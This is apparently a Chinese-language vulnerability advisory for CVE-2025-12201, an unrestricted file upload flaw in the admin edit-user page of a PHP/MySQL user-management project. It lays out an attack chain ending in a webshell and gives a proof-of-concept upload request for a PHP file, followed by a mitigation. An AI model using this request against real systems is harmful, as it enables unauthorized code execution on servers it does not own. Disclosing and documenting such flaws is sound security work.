IPBUF安全漏洞报告

English

CVE-2025-12201 CVSS 4.7 中危

CVE-2025-12201 ajayrandhawa User-Management-PHP-MYSQL 无限制文件上传漏洞

披露日期: 2025-10-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12201

漏洞类型

无限制文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

ajayrandhawa User-Management-PHP-MYSQL

漏洞概述

该漏洞存在于 ajayrandhawa User-Management-PHP-MYSQL 系统中，攻击者可通过 /admin/edit-user.php 端点利用 image 参数上传恶意文件，成功利用后可执行任意代码或植入后门。

技术细节

漏洞源于 /admin/edit-user.php 中对用户上传的 image 字段缺乏有效验证，攻击者可上传任意扩展名文件。

攻击链分析

STEP 1

步骤1

识别目标系统

STEP 2

步骤2

访问 /admin/edit-user.php

STEP 3

步骤3

构造恶意文件上传请求

STEP 4

步骤4

获取 webshell

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

POST /admin/edit-user.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data

--boundary
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
--boundary--

影响范围

ajayrandhawa User-Management-PHP-MYSQL <= fedcf58797bf2791591606f7b61fdad99ad8bff1

防御指南

临时缓解措施

立即限制 /admin/edit-user.php 的访问权限，禁用文件上传功能直至完成修复

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12201
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12201
3 Details https://www.cvedetails.com/cve/CVE-2025-12201/
4 VulDB https://vuldb.com/cve/CVE-2025-12201
5 Link https://github.com/Lianhaorui/Report/blob/main/FileUpload.docx
6 Link https://vuldb.com/?ctiid.329871
7 Link https://vuldb.com/?id.329871
8 Link https://vuldb.com/?submit.673156

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表